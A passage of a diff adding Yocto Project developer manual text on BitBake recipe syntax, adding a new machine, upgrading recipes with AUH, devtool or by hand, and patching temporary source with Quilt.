+  If image prelinking is enabled (e.g. "image-prelink" is in :term:`USER_CLASSES`
+  which it is by default), prelink will change the binaries in the generated images
+  and this often catches people out. Remove that class to ensure binaries are
+  preserved exactly if that is necessary.
+
+Following Recipe Style Guidelines
+---------------------------------
+
+When writing recipes, it is good to conform to existing style
+guidelines. The :oe_home:`OpenEmbedded Styleguide </wiki/Styleguide>` wiki page
+provides rough guidelines for preferred recipe style.
+
+It is common for existing recipes to deviate a bit from this style.
+However, aiming for at least a consistent style is a good idea. Some
+practices, such as omitting spaces around ``=`` operators in assignments
+or ordering recipe components in an erratic way, are widely seen as poor
+style.
+
+Recipe Syntax
+-------------
+
+Understanding recipe file syntax is important for writing recipes. The
+following list overviews the basic items that make up a BitBake recipe
+file. For more complete BitBake syntax descriptions, see the
+":doc:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata`"
+chapter of the BitBake User Manual.
+
+-  *Variable Assignments and Manipulations:* Variable assignments allow
+   a value to be assigned to a variable. The assignment can be static
+   text or might include the contents of other variables. In addition to
+   the assignment, appending and prepending operations are also
+   supported.
+
+   The following example shows some of the ways you can use variables in
+   recipes:
+   ::
+
+      S = "${WORKDIR}/postfix-${PV}"
+      CFLAGS += "-DNO_ASM"
+      SRC_URI_append = " file://fixup.patch"
+
+-  *Functions:* Functions provide a series of actions to be performed.
+   You usually use functions to override the default implementation of a
+   task function or to complement a default function (i.e. append or
+   prepend to an existing function). Standard functions use ``sh`` shell
+   syntax, although access to OpenEmbedded variables and internal
+   methods are also available.
+
+   The following is an example function from the ``sed`` recipe:
+   ::
+
+      do_install () {
+          autotools_do_install
+          install -d ${D}${base_bindir}
+          mv ${D}${bindir}/sed ${D}${base_bindir}/sed
+          rmdir ${D}${bindir}/
+      }
+
+   It is
+   also possible to implement new functions that are called between
+   existing tasks as long as the new functions are not replacing or
+   complementing the default functions. You can implement functions in
+   Python instead of shell. Both of these options are not seen in the
+   majority of recipes.
+
+-  *Keywords:* BitBake recipes use only a few keywords. You use keywords
+   to include common functions (``inherit``), load parts of a recipe
+   from other files (``include`` and ``require``) and export variables
+   to the environment (``export``).
+
+   The following example shows the use of some of these keywords:
+   ::
+
+      export POSTCONF = "${STAGING_BINDIR}/postconf"
+      inherit autoconf
+      require otherfile.inc
+
+-  *Comments (#):* Any lines that begin with the hash character (``#``)
+   are treated as comment lines and are ignored:
+   ::
+
+      # This is a comment
+
+This next list summarizes the most important and most commonly used
+parts of the recipe syntax. For more information on these parts of the
+syntax, you can reference the
+:doc:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata` chapter
+in the BitBake User Manual.
+
+-  *Line Continuation (\\):* Use the backward slash (``\``) character to
+   split a statement over multiple lines. Place the slash character at
+   the end of the line that is to be continued on the next line:
+   ::
+
+       VAR = "A really long \
+              line"
+
+   .. note::
+
+      You cannot have any characters including spaces or tabs after the
+      slash character.
+
+-  *Using Variables (${VARNAME}):* Use the ``${VARNAME}`` syntax to
+   access the contents of a variable:
+   ::
+
+      SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/zlib-${PV}.tar.gz"
+
+   .. note::
+
+      It is important to understand that the value of a variable
+      expressed in this form does not get substituted automatically. The
+      expansion of these expressions happens on-demand later (e.g.
+      usually when a function that makes reference to the variable
+      executes). This behavior ensures that the values are most
+      appropriate for the context in which they are finally used. On the
+      rare occasion that you do need the variable expression to be
+      expanded immediately, you can use the
+      :=
+      operator instead of
+      =
+      when you make the assignment, but this is not generally needed.
+
+-  *Quote All Assignments ("value"):* Use double quotes around values in
+   all variable assignments (e.g. ``"value"``). Following is an example:
+   ::
+
+      VAR1 = "${OTHERVAR}"
+      VAR2 = "The version is ${PV}"
+
+-  *Conditional Assignment (?=):* Conditional assignment is used to
+   assign a value to a variable, but only when the variable is currently
+   unset. Use the question mark followed by the equal sign (``?=``) to
+   make a "soft" assignment used for conditional assignment. Typically,
+   "soft" assignments are used in the ``local.conf`` file for variables
+   that are allowed to come through from the external environment.
+
+   Here is an example where ``VAR1`` is set to "New value" if it is
+   currently empty. However, if ``VAR1`` has already been set, it
+   remains unchanged:
+   ::
+
+      VAR1 ?= "New value"
+
+   In this next example, ``VAR1`` is left with the value "Original value":
+   ::
+
+      VAR1 = "Original value"
+      VAR1 ?= "New value"
+
+-  *Appending (+=):* Use the plus character followed by the equals sign
+   (``+=``) to append values to existing variables.
+
+   .. note::
+
+      This operator adds a space between the existing content of the
+      variable and the new content.
+
+   Here is an example:
+   ::
+
+      SRC_URI += "file://fix-makefile.patch"
+
+-  *Prepending (=+):* Use the equals sign followed by the plus character
+   (``=+``) to prepend values to existing variables.
+
+   .. note::
+
+      This operator adds a space between the new content and the
+      existing content of the variable.
+
+   Here is an example:
+   ::
+
+      VAR =+ "Starts"
+
+-  *Appending (_append):* Use the ``_append`` operator to append values
+   to existing variables. This operator does not add any additional
+   space. Also, the operator is applied after all the ``+=``, and ``=+``
+   operators have been applied and after all ``=`` assignments have
+   occurred.
+
+   The following example shows the space being explicitly added to the
+   start to ensure the appended value is not merged with the existing
+   value:
+   ::
+
+      SRC_URI_append = " file://fix-makefile.patch"
+
+   You can also use
+   the ``_append`` operator with overrides, which results in the actions
+   only being performed for the specified target or machine:
+   ::
+
+      SRC_URI_append_sh4 = " file://fix-makefile.patch"
+
+-  *Prepending (_prepend):* Use the ``_prepend`` operator to prepend
+   values to existing variables. This operator does not add any
+   additional space. Also, the operator is applied after all the ``+=``,
+   and ``=+`` operators have been applied and after all ``=``
+   assignments have occurred.
+
+   The following example shows the space being explicitly added to the
+   end to ensure the prepended value is not merged with the existing
+   value:
+   ::
+
+      CFLAGS_prepend = "-I${S}/myincludes "
+
+   You can also use the
+   ``_prepend`` operator with overrides, which results in the actions
+   only being performed for the specified target or machine:
+   ::
+
+      CFLAGS_prepend_sh4 = "-I${S}/myincludes "
+
+-  *Overrides:* You can use overrides to set a value conditionally,
+   typically based on how the recipe is being built. For example, to set
+   the :term:`KBRANCH` variable's
+   value to "standard/base" for any target
+   :term:`MACHINE`, except for
+   qemuarm where it should be set to "standard/arm-versatile-926ejs",
+   you would do the following:
+   ::
+
+      KBRANCH = "standard/base"
+      KBRANCH_qemuarm = "standard/arm-versatile-926ejs"
+
+   Overrides are also used to separate
+   alternate values of a variable in other situations. For example, when
+   setting variables such as
+   :term:`FILES` and
+   :term:`RDEPENDS` that are
+   specific to individual packages produced by a recipe, you should
+   always use an override that specifies the name of the package.
+
+-  *Indentation:* Use spaces for indentation rather than tabs. For
+   shell functions, both currently work. However, it is a policy
+   decision of the Yocto Project to use tabs in shell functions. Realize
+   that some layers have a policy to use spaces for all indentation.
+
+-  *Using Python for Complex Operations:* For more advanced processing,
+   it is possible to use Python code during variable assignments (e.g.
+   search and replacement on a variable).
+
+   You indicate Python code using the ``${@python_code}`` syntax for the
+   variable assignment:
+   ::
+
+      SRC_URI = "ftp://ftp.info-zip.org/pub/infozip/src/zip${@d.getVar('PV',1).replace('.', '')}.tgz
+
+-  *Shell Function Syntax:* Write shell functions as if you were writing
+   a shell script when you describe a list of actions to take. You
+   should ensure that your script works with a generic ``sh`` and that
+   it does not require any ``bash`` or other shell-specific
+   functionality. The same considerations apply to various system
+   utilities (e.g. ``sed``, ``grep``, ``awk``, and so forth) that you
+   might wish to use. If in doubt, you should check with multiple
+   implementations - including those from BusyBox.
+
+.. _platdev-newmachine:
+
+Adding a New Machine
+====================
+
+Adding a new machine to the Yocto Project is a straightforward process.
+This section describes how to add machines that are similar to those
+that the Yocto Project already supports.
+
+.. note::
+
+   Although well within the capabilities of the Yocto Project, adding a
+   totally new architecture might require changes to ``gcc``/``glibc``
+   and to the site information, which is beyond the scope of this
+   manual.
+
+For a complete example that shows how to add a new machine, see the
+":ref:`bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script`"
+section in the Yocto Project Board Support Package (BSP) Developer's
+Guide.
+
+.. _platdev-newmachine-conffile:
+
+Adding the Machine Configuration File
+-------------------------------------
+
+To add a new machine, you need to add a new machine configuration file
+to the layer's ``conf/machine`` directory. This configuration file
+provides details about the device you are adding.
+
+The OpenEmbedded build system uses the root name of the machine
+configuration file to reference the new machine. For example, given a
+machine configuration file named ``crownbay.conf``, the build system
+recognizes the machine as "crownbay".
+
+The most important variables you must set in your machine configuration
+file or include from a lower-level configuration file are as follows:
+
+-  ``TARGET_ARCH`` (e.g. "arm")
+
+-  ``PREFERRED_PROVIDER_virtual/kernel``
+
+-  ``MACHINE_FEATURES`` (e.g. "apm screen wifi")
+
+You might also need these variables:
+
+-  ``SERIAL_CONSOLES`` (e.g. "115200;ttyS0 115200;ttyS1")
+
+-  ``KERNEL_IMAGETYPE`` (e.g. "zImage")
+
+-  ``IMAGE_FSTYPES`` (e.g. "tar.gz jffs2")
+
+You can find full details on these variables in the reference section.
+You can leverage existing machine ``.conf`` files from
+``meta-yocto-bsp/conf/machine/``.
+
+.. _platdev-newmachine-kernel:
+
+Adding a Kernel for the Machine
+-------------------------------
+
+The OpenEmbedded build system needs to be able to build a kernel for the
+machine. You need to either create a new kernel recipe for this machine,
+or extend an existing kernel recipe. You can find several kernel recipe
+examples in the Source Directory at ``meta/recipes-kernel/linux`` that
+you can use as references.
+
+If you are creating a new kernel recipe, normal recipe-writing rules
+apply for setting up a ``SRC_URI``. Thus, you need to specify any
+necessary patches and set ``S`` to point at the source code. You need to
+create a ``do_configure`` task that configures the unpacked kernel with
+a ``defconfig`` file. You can do this by using a ``make defconfig``
+command or, more commonly, by copying in a suitable ``defconfig`` file
+and then running ``make oldconfig``. By making use of ``inherit kernel``
+and potentially some of the ``linux-*.inc`` files, most other
+functionality is centralized and the defaults of the class normally work
+well.
+
+If you are extending an existing kernel recipe, it is usually a matter
+of adding a suitable ``defconfig`` file. The file needs to be added into
+a location similar to ``defconfig`` files used for other machines in a
+given kernel recipe. A possible way to do this is by listing the file in
+the ``SRC_URI`` and adding the machine to the expression in
+``COMPATIBLE_MACHINE``:
+::
+
+   COMPATIBLE_MACHINE = '(qemux86|qemumips)'
+
+For more information on ``defconfig`` files, see the
+":ref:`kernel-dev/kernel-dev-common:changing the configuration`"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _platdev-newmachine-formfactor:
+
+Adding a Formfactor Configuration File
+--------------------------------------
+
+A formfactor configuration file provides information about the target
+hardware for which the image is being built and information that the
+build system cannot obtain from other sources such as the kernel. Some
+examples of information contained in a formfactor configuration file
+include framebuffer orientation, whether or not the system has a
+keyboard, the positioning of the keyboard in relation to the screen, and
+the screen resolution.
+
+The build system uses reasonable defaults in most cases. However, if
+customization is necessary, you need to create a ``machconfig`` file in
+the ``meta/recipes-bsp/formfactor/files`` directory. This directory
+contains directories for specific machines such as ``qemuarm`` and
+``qemux86``. For information about the settings available and the
+defaults, see the ``meta/recipes-bsp/formfactor/files/config`` file
+found in the same area.
+
+Following is an example for "qemuarm" machine:
+::
+
+   HAVE_TOUCHSCREEN=1
+   HAVE_KEYBOARD=1
+   DISPLAY_CAN_ROTATE=0
+   DISPLAY_ORIENTATION=0
+   #DISPLAY_WIDTH_PIXELS=640
+   #DISPLAY_HEIGHT_PIXELS=480
+   #DISPLAY_BPP=16
+   DISPLAY_DPI=150
+   DISPLAY_SUBPIXEL_ORDER=vrgb
+
+.. _gs-upgrading-recipes:
+
+Upgrading Recipes
+=================
+
+Over time, upstream developers publish new versions for software built
+by layer recipes. It is recommended to keep recipes up-to-date with
+upstream version releases.
+
+While several methods exist that allow you upgrade a recipe, you might
+consider checking on the upgrade status of a recipe first. You can do so
+using the ``devtool check-upgrade-status`` command. See the
+":ref:`devtool-checking-on-the-upgrade-status-of-a-recipe`"
+section in the Yocto Project Reference Manual for more information.
+
+The remainder of this section describes three ways you can upgrade a
+recipe. You can use the Automated Upgrade Helper (AUH) to set up
+automatic version upgrades. Alternatively, you can use
+``devtool upgrade`` to set up semi-automatic version upgrades. Finally,
+you can manually upgrade a recipe by editing the recipe itself.
+
+.. _gs-using-the-auto-upgrade-helper:
+
+Using the Auto Upgrade Helper (AUH)
+-----------------------------------
+
+The AUH utility works in conjunction with the OpenEmbedded build system
+in order to automatically generate upgrades for recipes based on new
+versions being published upstream. Use AUH when you want to create a
+service that performs the upgrades automatically and optionally sends
+you an email with the results.
+
+AUH allows you to update several recipes with a single use. You can also
+optionally perform build and integration tests using images with the
+results saved to your hard drive and emails of results optionally sent
+to recipe maintainers. Finally, AUH creates Git commits with appropriate
+commit messages in the layer's tree for the changes made to recipes.
+
+.. note::
+
+   Conditions do exist when you should not use AUH to upgrade recipes
+   and you should instead use either ``devtool upgrade`` or upgrade your
+   recipes manually:
+
+   -  When AUH cannot complete the upgrade sequence. This situation
+      usually results because custom patches carried by the recipe
+      cannot be automatically rebased to the new version. In this case,
+      ``devtool upgrade`` allows you to manually resolve conflicts.
+
+   -  When for any reason you want fuller control over the upgrade
+      process. For example, when you want special arrangements for
+      testing.
+
+The following steps describe how to set up the AUH utility:
+
+1. *Be Sure the Development Host is Set Up:* You need to be sure that
+   your development host is set up to use the Yocto Project. For
+   information on how to set up your host, see the
+   ":ref:`dev-preparing-the-build-host`" section.
+
+2. *Make Sure Git is Configured:* The AUH utility requires Git to be
+   configured because AUH uses Git to save upgrades. Thus, you must have
+   Git user and email configured. The following command shows your
+   configurations:
+   ::
+
+      $ git config --list
+
+   If you do not have the user and
+   email configured, you can use the following commands to do so:
+   ::
+
+      $ git config --global user.name some_name
+      $ git config --global user.email username@domain.com
+
+3. *Clone the AUH Repository:* To use AUH, you must clone the repository
+   onto your development host. The following command uses Git to create
+   a local copy of the repository on your system:
+   ::
+
+      $ git clone  git://git.yoctoproject.org/auto-upgrade-helper
+      Cloning into 'auto-upgrade-helper'... remote: Counting objects: 768, done.
+      remote: Compressing objects: 100% (300/300), done.
+      remote: Total 768 (delta 499), reused 703 (delta 434)
+      Receiving objects: 100% (768/768), 191.47 KiB | 98.00 KiB/s, done.
+      Resolving deltas: 100% (499/499), done.
+      Checking connectivity... done.
+
+   AUH is not part of the :term:`OpenEmbedded-Core (OE-Core)` or
+   :term:`Poky` repositories.
+
+4. *Create a Dedicated Build Directory:* Run the
+   :ref:`structure-core-script`
+   script to create a fresh build directory that you use exclusively for
+   running the AUH utility:
+   ::
+
+      $ cd ~/poky
+      $ source oe-init-build-env your_AUH_build_directory
+
+   Re-using an existing build directory and its configurations is not
+   recommended as existing settings could cause AUH to fail or behave
+   undesirably.
+
+5. *Make Configurations in Your Local Configuration File:* Several
+   settings need to exist in the ``local.conf`` file in the build
+   directory you just created for AUH. Make these following
+   configurations:
+
+   -  If you want to enable :ref:`Build
+      History <dev-manual/dev-manual-common-tasks:maintaining build output quality>`,
+      which is optional, you need the following lines in the
+      ``conf/local.conf`` file:
+      ::
+
+         INHERIT =+ "buildhistory"
+         BUILDHISTORY_COMMIT = "1"
+
+      With this configuration and a successful
+      upgrade, a build history "diff" file appears in the
+      ``upgrade-helper/work/recipe/buildhistory-diff.txt`` file found in
+      your build directory.
+
+   -  If you want to enable testing through the
+      :ref:`testimage <ref-classes-testimage*>`
+      class, which is optional, you need to have the following set in
+      your ``conf/local.conf`` file:
+      ::
+
+         INHERIT += "testimage"
+
+      .. note::
+
+         If your distro does not enable by default ptest, which Poky
+         does, you need the following in your ``local.conf`` file:
+         ::
+
+                 DISTRO_FEATURES_append = " ptest"
+
+
+6. *Optionally Start a vncserver:* If you are running in a server
+   without an X11 session, you need to start a vncserver:
+   ::
+
+      $ vncserver :1
+      $ export DISPLAY=:1
+
+7. *Create and Edit an AUH Configuration File:* You need to have the
+   ``upgrade-helper/upgrade-helper.conf`` configuration file in your
+   build directory. You can find a sample configuration file in the
+   :yocto_git:`AUH source repository </cgit/cgit.cgi/auto-upgrade-helper/tree/>`.
+
+   Read through the sample file and make configurations as needed. For
+   example, if you enabled build history in your ``local.conf`` as
+   described earlier, you must enable it in ``upgrade-helper.conf``.
+
+   Also, if you are using the default ``maintainers.inc`` file supplied
+   with Poky and located in ``meta-yocto`` and you do not set a
+   "maintainers_whitelist" or "global_maintainer_override" in the
+   ``upgrade-helper.conf`` configuration, and you specify "-e all" on
+   the AUH command-line, the utility automatically sends out emails to
+   all the default maintainers. Please avoid this.
+
+This next set of examples describes how to use the AUH:
+
+-  *Upgrading a Specific Recipe:* To upgrade a specific recipe, use the
+   following form:
+   ::
+
+      $ upgrade-helper.py recipe_name
+
+   For example, this command upgrades the ``xmodmap`` recipe:
+   ::
+
+      $ upgrade-helper.py xmodmap
+
+-  *Upgrading a Specific Recipe to a Particular Version:* To upgrade a
+   specific recipe to a particular version, use the following form:
+   ::
+
+      $ upgrade-helper.py recipe_name -t version
+
+   For example, this command upgrades the ``xmodmap`` recipe to version 1.2.3:
+   ::
+
+      $ upgrade-helper.py xmodmap -t 1.2.3
+
+-  *Upgrading all Recipes to the Latest Versions and Suppressing Email
+   Notifications:* To upgrade all recipes to their most recent versions
+   and suppress the email notifications, use the following command:
+   ::
+
+      $ upgrade-helper.py all
+
+-  *Upgrading all Recipes to the Latest Versions and Send Email
+   Notifications:* To upgrade all recipes to their most recent versions
+   and send email messages to maintainers for each attempted recipe as
+   well as a status email, use the following command:
+   ::
+
+      $ upgrade-helper.py -e all
+
+Once you have run the AUH utility, you can find the results in the AUH
+build directory:
+::
+
+   ${BUILDDIR}/upgrade-helper/timestamp
+
+The AUH utility
+also creates recipe update commits from successful upgrade attempts in
+the layer tree.
+
+You can easily set up to run the AUH utility on a regular basis by using
+a cron job. See the
+:yocto_git:`weeklyjob.sh </cgit/cgit.cgi/auto-upgrade-helper/tree/weeklyjob.sh>`
+file distributed with the utility for an example.
+
+.. _gs-using-devtool-upgrade:
+
+Using ``devtool upgrade``
+-------------------------
+
+As mentioned earlier, an alternative method for upgrading recipes to
+newer versions is to use
+:doc:`devtool upgrade <../ref-manual/ref-devtool-reference>`.
+You can read about ``devtool upgrade`` in general in the
+":ref:`sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) Manual.
+
+To see all the command-line options available with ``devtool upgrade``,
+use the following help command:
+::
+
+   $ devtool upgrade -h
+
+If you want to find out what version a recipe is currently at upstream
+without any attempt to upgrade your local version of the recipe, you can
+use the following command:
+::
+
+   $ devtool latest-version recipe_name
+
+As mentioned in the previous section describing AUH, ``devtool upgrade``
+works in a less-automated manner than AUH. Specifically,
+``devtool upgrade`` only works on a single recipe that you name on the
+command line, cannot perform build and integration testing using images,
+and does not automatically generate commits for changes in the source
+tree. Despite all these "limitations", ``devtool upgrade`` updates the
+recipe file to the new upstream version and attempts to rebase custom
+patches contained by the recipe as needed.
+
+.. note::
+
+   AUH uses much of ``devtool upgrade`` behind the scenes making AUH somewhat
+   of a "wrapper" application for ``devtool upgrade``.
+
+A typical scenario involves having used Git to clone an upstream
+repository that you use during build operations. Because you have built the
+recipe in the past, the layer is likely added to your
+configuration already. If for some reason, the layer is not added, you
+could add it easily using the
+":ref:`bitbake-layers <bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script>`"
+script. For example, suppose you use the ``nano.bb`` recipe from the
+``meta-oe`` layer in the ``meta-openembedded`` repository. For this
+example, assume that the layer has been cloned into following area:
+::
+
+   /home/scottrif/meta-openembedded
+
+The following command from your
+:term:`Build Directory` adds the layer to
+your build configuration (i.e. ``${BUILDDIR}/conf/bblayers.conf``):
+::
+
+   $ bitbake-layers add-layer /home/scottrif/meta-openembedded/meta-oe
+   NOTE: Starting bitbake server...
+   Parsing recipes: 100% |##########################################| Time: 0:00:55
+   Parsing of 1431 .bb files complete (0 cached, 1431 parsed). 2040 targets, 56 skipped, 0 masked, 0 errors.
+   Removing 12 recipes from the x86_64 sysroot: 100% |##############| Time: 0:00:00
+   Removing 1 recipes from the x86_64_i586 sysroot: 100% |##########| Time: 0:00:00
+   Removing 5 recipes from the i586 sysroot: 100% |#################| Time: 0:00:00
+   Removing 5 recipes from the qemux86 sysroot: 100% |##############| Time: 0:00:00
+
+For this example, assume that the ``nano.bb`` recipe that
+is upstream has a 2.9.3 version number. However, the version in the
+local repository is 2.7.4. The following command from your build
+directory automatically upgrades the recipe for you:
+
+.. note::
+
+   Using the ``-V`` option is not necessary. Omitting the version number causes
+   ``devtool upgrade`` to upgrade the recipe to the most recent version.
+
+::
+
+   $ devtool upgrade nano -V 2.9.3
+   NOTE: Starting bitbake server...
+   NOTE: Creating workspace layer in /home/scottrif/poky/build/workspace
+   Parsing recipes: 100% |##########################################| Time: 0:00:46
+   Parsing of 1431 .bb files complete (0 cached, 1431 parsed). 2040 targets, 56 skipped, 0 masked, 0 errors.
+   NOTE: Extracting current version source...
+   NOTE: Resolving any missing task queue dependencies
+          .
+          .
+          .
+   NOTE: Executing SetScene Tasks
+   NOTE: Executing RunQueue Tasks
+   NOTE: Tasks Summary: Attempted 74 tasks of which 72 didn't need to be rerun and all succeeded.
+   Adding changed files: 100% |#####################################| Time: 0:00:00
+   NOTE: Upgraded source extracted to /home/scottrif/poky/build/workspace/sources/nano
+   NOTE: New recipe is /home/scottrif/poky/build/workspace/recipes/nano/nano_2.9.3.bb
+
+Continuing with this example, you can use ``devtool build`` to build the
+newly upgraded recipe:
+::
+
+   $ devtool build nano
+   NOTE: Starting bitbake server...
+   Loading cache: 100% |################################################################################################| Time: 0:00:01
+   Loaded 2040 entries from dependency cache.
+   Parsing recipes: 100% |##############################################################################################| Time: 0:00:00
+   Parsing of 1432 .bb files complete (1431 cached, 1 parsed). 2041 targets, 56 skipped, 0 masked, 0 errors.
+   NOTE: Resolving any missing task queue dependencies
+          .
+          .
+          .
+   NOTE: Executing SetScene Tasks
+   NOTE: Executing RunQueue Tasks
+   NOTE: nano: compiling from external source tree /home/scottrif/poky/build/workspace/sources/nano
+   NOTE: Tasks Summary: Attempted 520 tasks of which 304 didn't need to be rerun and all succeeded.
+
+Within the ``devtool upgrade`` workflow, opportunity
+exists to deploy and test your rebuilt software. For this example,
+however, running ``devtool finish`` cleans up the workspace once the
+source in your workspace is clean. This usually means using Git to stage
+and submit commits for the changes generated by the upgrade process.
+
+Once the tree is clean, you can clean things up in this example with the
+following command from the ``${BUILDDIR}/workspace/sources/nano``
+directory:
+::
+
+   $ devtool finish nano meta-oe
+   NOTE: Starting bitbake server...
+   Loading cache: 100% |################################################################################################| Time: 0:00:00
+   Loaded 2040 entries from dependency cache.
+   Parsing recipes: 100% |##############################################################################################| Time: 0:00:01
+   Parsing of 1432 .bb files complete (1431 cached, 1 parsed). 2041 targets, 56 skipped, 0 masked, 0 errors.
+   NOTE: Adding new patch 0001-nano.bb-Stuff-I-changed-when-upgrading-nano.bb.patch
+   NOTE: Updating recipe nano_2.9.3.bb
+   NOTE: Removing file /home/scottrif/meta-openembedded/meta-oe/recipes-support/nano/nano_2.7.4.bb
+   NOTE: Moving recipe file to /home/scottrif/meta-openembedded/meta-oe/recipes-support/nano
+   NOTE: Leaving source tree /home/scottrif/poky/build/workspace/sources/nano as-is; if you no longer need it then please delete it manually
+
+
+Using the ``devtool finish`` command cleans up the workspace and creates a patch
+file based on your commits. The tool puts all patch files back into the
+source directory in a sub-directory named ``nano`` in this case.
+
+.. _dev-manually-upgrading-a-recipe:
+
+Manually Upgrading a Recipe
+---------------------------
+
+If for some reason you choose not to upgrade recipes using
+:ref:`gs-using-the-auto-upgrade-helper` or by :ref:`gs-using-devtool-upgrade`,
+you can manually edit the recipe files to upgrade the versions.
+
+.. note::
+
+   Manually updating multiple recipes scales poorly and involves many
+   steps. The recommendation to upgrade recipe versions is through AUH
+   or ``devtool upgrade``, both of which automate some steps and provide
+   guidance for others needed for the manual process.
+
+To manually upgrade recipe versions, follow these general steps:
+
+1. *Change the Version:* Rename the recipe such that the version (i.e.
+   the :term:`PV` part of the recipe name)
+   changes appropriately. If the version is not part of the recipe name,
+   change the value as it is set for ``PV`` within the recipe itself.
+
+2. *Update* ``SRCREV`` *if Needed*: If the source code your recipe builds
+   is fetched from Git or some other version control system, update
+   :term:`SRCREV` to point to the
+   commit hash that matches the new version.
+
+3. *Build the Software:* Try to build the recipe using BitBake. Typical
+   build failures include the following:
+
+   -  License statements were updated for the new version. For this
+      case, you need to review any changes to the license and update the
+      values of :term:`LICENSE` and
+      :term:`LIC_FILES_CHKSUM`
+      as needed.
+
+      .. note::
+
+         License changes are often inconsequential. For example, the
+         license text's copyright year might have changed.
+
+   -  Custom patches carried by the older version of the recipe might
+      fail to apply to the new version. For these cases, you need to
+      review the failures. Patches might not be necessary for the new
+      version of the software if the upgraded version has fixed those
+      issues. If a patch is necessary and failing, you need to rebase it
+      into the new version.
+
+4. *Optionally Attempt to Build for Several Architectures:* Once you
+   successfully build the new software for a given architecture, you
+   could test the build for other architectures by changing the
+   :term:`MACHINE` variable and
+   rebuilding the software. This optional step is especially important
+   if the recipe is to be released publicly.
+
+5. *Check the Upstream Change Log or Release Notes:* Checking both these
+   reveals if new features exist that could break
+   backwards-compatibility. If so, you need to take steps to mitigate or
+   eliminate that situation.
+
+6. *Optionally Create a Bootable Image and Test:* If you want, you can
+   test the new software by booting it onto actual hardware.
+
+7. *Create a Commit with the Change in the Layer Repository:* After all
+   builds work and any testing is successful, you can create commits for
+   any changes in the layer holding your upgraded recipe.
+
+.. _finding-the-temporary-source-code:
+
+Finding Temporary Source Code
+=============================
+
+You might find it helpful during development to modify the temporary
+source code used by recipes to build packages. For example, suppose you
+are developing a patch and you need to experiment a bit to figure out
+your solution. After you have initially built the package, you can
+iteratively tweak the source code, which is located in the
+:term:`Build Directory`, and then you can
+force a re-compile and quickly test your altered code. Once you settle
+on a solution, you can then preserve your changes in the form of
+patches.
+
+During a build, the unpacked temporary source code used by recipes to
+build packages is available in the Build Directory as defined by the
+:term:`S` variable. Below is the default
+value for the ``S`` variable as defined in the
+``meta/conf/bitbake.conf`` configuration file in the
+:term:`Source Directory`:
+::
+
+   S = "${WORKDIR}/${BP}"
+
+You should be aware that many recipes override the
+``S`` variable. For example, recipes that fetch their source from Git
+usually set ``S`` to ``${WORKDIR}/git``.
+
+.. note::
+
+   The :term:`BP` represents the base recipe name, which consists of the name
+   and version:
+   ::
+
+           BP = "${BPN}-${PV}"
+
+
+The path to the work directory for the recipe
+(:term:`WORKDIR`) is defined as
+follows:
+::
+
+   ${TMPDIR}/work/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}
+
+The actual directory depends on several things:
+
+-  :term:`TMPDIR`: The top-level build
+   output directory.
+
+-  :term:`MULTIMACH_TARGET_SYS`:
+   The target system identifier.
+
+-  :term:`PN`: The recipe name.
+
+-  :term:`EXTENDPE`: The epoch - (if
+   :term:`PE` is not specified, which is
+   usually the case for most recipes, then ``EXTENDPE`` is blank).
+
+-  :term:`PV`: The recipe version.
+
+-  :term:`PR`: The recipe revision.
+
+As an example, assume a Source Directory top-level folder named
+``poky``, a default Build Directory at ``poky/build``, and a
+``qemux86-poky-linux`` machine target system. Furthermore, suppose your
+recipe is named ``foo_1.3.0.bb``. In this case, the work directory the
+build system uses to build the package would be as follows:
+::
+
+   poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
+
+.. _using-a-quilt-workflow:
+
+Using Quilt in Your Workflow
+============================
+
+`Quilt <https://savannah.nongnu.org/projects/quilt>`__ is a powerful tool
+that allows you to capture source code changes without having a clean
+source tree. This section outlines the typical workflow you can use to
+modify source code, test changes, and then preserve the changes in the
+form of a patch all using Quilt.
+
+.. note::
+
+   With regard to preserving changes to source files, if you clean a
+   recipe or have ``rm_work`` enabled, the
+   :ref:`devtool workflow <sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow>`
+   as described in the Yocto Project Application Development and the
+   Extensible Software Development Kit (eSDK) manual is a safer
+   development flow than the flow that uses Quilt.
+
+Follow these general steps:
+
+1. *Find the Source Code:* Temporary source code used by the
+   OpenEmbedded build system is kept in the
+   :term:`Build Directory`. See the
+   "`Finding Temporary Source
+   Code <#finding-the-temporary-source-code>`__" section to learn how to
+   locate the directory that has the temporary source code for a
+   particular package.
+
+2. *Change Your Working Directory:* You need to be in the directory that
+   has the temporary source code. That directory is defined by the
+   :term:`S` variable.
+
+3. *Create a New Patch:* Before modifying source code, you need to
+   create a new patch. To create a new patch file, use ``quilt new`` as
+   below:
+   ::
+
+      $ quilt new my_changes.patch
+
+4. *Notify Quilt and Add Files:* After creating the patch, you need to
+   notify Quilt about the files you plan to edit. You notify Quilt by
+   adding the files to the patch you just created:
+   ::
+
+      $ quilt add file1.c file2.c file3.c
+
+5. *Edit the Files:* Make your changes in the source code to the files
+   you added to the patch.
+
+6. *Test Your Changes:* Once you have modified the source code, the
+   easiest way to test your changes is by calling the ``do_compile``
+   task as shown in the following example:
+   ::
+
+      $ bitbake -c compile -f package
+
+   The ``-f`` or ``--force`` option forces the specified task to
+   execute. If you find problems with your code, you can just keep
+   editing and re-testing iteratively until things work as expected.
+
+   .. note::
+
+      All the modifications you make to the temporary source code disappear
+      once you run the ``do_clean`` or ``do_cleanall`` tasks using BitBake
+      (i.e. ``bitbake -c clean package`` and ``bitbake -c cleanall package``).
+      Modifications will also disappear if you use the ``rm_work`` feature as
+      described in the
+      ":ref:`dev-manual/dev-manual-common-tasks:conserving disk space during builds`"
+      section.
+
+7. *Generate the Patch:* Once your changes work as expected, you need to
+   use Quilt to generate the final patch that contains all your
+   modifications.
+   ::
+
+      $ quilt refresh
+
+   At this point, the
+   ``my_changes.patch`` file has all your edits made to the ``file1.c``,
+   ``file2.c``, and ``file3.c`` files.
+
+   You can find the resulting patch file in the ``patches/``
+   subdirectory of the source (``S``) directory.
+
